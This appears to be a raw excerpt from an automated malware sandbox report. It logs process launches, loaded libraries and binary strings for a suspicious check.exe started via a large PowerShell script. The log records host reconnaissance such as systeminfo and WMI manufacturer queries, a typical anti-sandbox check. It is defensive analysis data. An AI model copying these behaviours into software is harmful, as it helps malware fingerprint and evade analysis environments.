Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeProcess created: C:\Users\user\AppData\Roaming\HseeHuht\check.exe "C:\Users\user\AppData\Roaming\HseeHuht\check.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfoJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer"Jump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeProcess created: C:\Users\user\AppData\Roaming\HseeHuht\check.exe "C:\Users\user\AppData\Roaming\HseeHuht\check.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeProcess created: C:\Users\user\AppData\Roaming\HseeHuht\check.exe "C:\Users\user\AppData\Roaming\HseeHuht\check.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get manufacturer
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer"
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get manufacturer
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get manufacturer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: libffi-8.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: qt5core.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: msvcp140.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: msvcp140_1.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: libcrypto-3.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: libssl-3.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: pdh.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: qt5widgets.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: qt5gui.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: qt5gui.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: d3d9.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: dataexchange.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: dcomp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: libffi-8.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: qt5core.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: netapi32.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: msvcp140.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: msvcp140_1.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: vcruntime140_1.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: vcruntime140_1.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: libcrypto-3.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: libssl-3.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: powrprof.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: pdh.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: umpdc.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: qt5widgets.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: qt5gui.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: qt5gui.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: dwmapi.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: d3d11.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: dxgi.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: dxgi.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: d3d9.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: d3d10warp.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: dataexchange.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: dcomp.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: twinapi.appcore.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: libffi-8.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: qt5core.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: netapi32.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: msvcp140.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: msvcp140_1.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: vcruntime140_1.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: vcruntime140_1.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: libcrypto-3.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: libssl-3.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: powrprof.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: pdh.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: umpdc.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: qt5widgets.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: qt5gui.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: qt5gui.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: dwmapi.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: d3d11.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: dxgi.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: dxgi.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: d3d9.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: d3d10warp.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: dataexchange.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: dcomp.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: twinapi.appcore.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\InProcServer32Jump to behavior
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: download.ps1Static file information: File size 51316506 > 1048576
Source: Binary string: C:\Users\qt\work\qt\qtimageformats\plugins\imageformats\qtiff.pdbBB source: check.exe, 00000004.00000003.1610880860.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\plugins\platformthemes\qxdgdesktopportal.pdb source: check.exe, 00000004.00000003.1613622997.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtsvg\plugins\imageformats\qsvg.pdb source: check.exe, 00000004.00000003.1610571166.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtsvg\plugins\iconengines\qsvgicon.pdb source: check.exe, 00000004.00000003.1605150229.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: check.exe, 00000005.00000002.2236169287.00007FFB02427000.00000002.00000001.01000000.00000020.sdmp
Source: Binary string: D:\a\1\b\libcrypto-3.pdb| source: check.exe, 00000005.00000002.2238792749.00007FFB0287A000.00000002.00000001.01000000.0000001A.sdmp
Source: Binary string: d:\agent\_work\1\s\\binaries\amd64ret\bin\amd64\\msvcp140_1.amd64.pdb source: check.exe, 00000004.00000003.1574176850.000001A2C2634000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2254484299.00007FFB1E3A3000.00000002.00000001.01000000.00000014.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\plugins\generic\qtuiotouchplugin.pdb source: check.exe, 00000004.00000003.1604956323.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\libssl-3.pdbDD source: check.exe, 00000005.00000002.2247223611.00007FFB0B4E5000.00000002.00000001.01000000.0000001B.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Core.pdb source: check.exe, 00000005.00000002.2240383071.00007FFB02DB6000.00000002.00000001.01000000.00000012.sdmp
Source: Binary string: d:\agent\_work\1\s\\binaries\amd64ret\bin\amd64\\msvcp140.amd64.pdb source: check.exe, 00000005.00000002.2248013982.00007FFB0B585000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\plugins\imageformats\qico.pdb source: check.exe, 00000004.00000003.1605718815.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtimageformats\plugins\imageformats\qtiff.pdb source: check.exe, 00000004.00000003.1610880860.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\plugins\imageformats\qgif.pdb source: check.exe, 00000004.00000003.1605332186.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp
